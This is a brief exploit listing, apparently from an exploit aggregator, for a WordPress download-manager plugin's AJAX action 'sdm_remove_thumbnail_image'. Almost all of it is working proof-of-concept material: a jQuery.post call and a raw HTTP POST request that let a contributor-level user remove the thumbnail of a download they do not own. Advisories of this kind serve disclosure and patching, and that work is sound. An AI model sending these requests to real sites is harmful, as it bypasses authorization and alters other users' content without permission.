Share
## https://sploitus.com/exploit?id=WPEX-ID:1FDA1356-77D8-4E77-9EE6-8F9CEEB3D380
jQuery.post(ajaxurl, {
action: "sdm_remove_thumbnail_image",
post_id_del: 613 // not owned by the user
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: [contrib+ not owning the download to remove the thumbnail from]

action=sdm_remove_thumbnail_image&post_id_del=613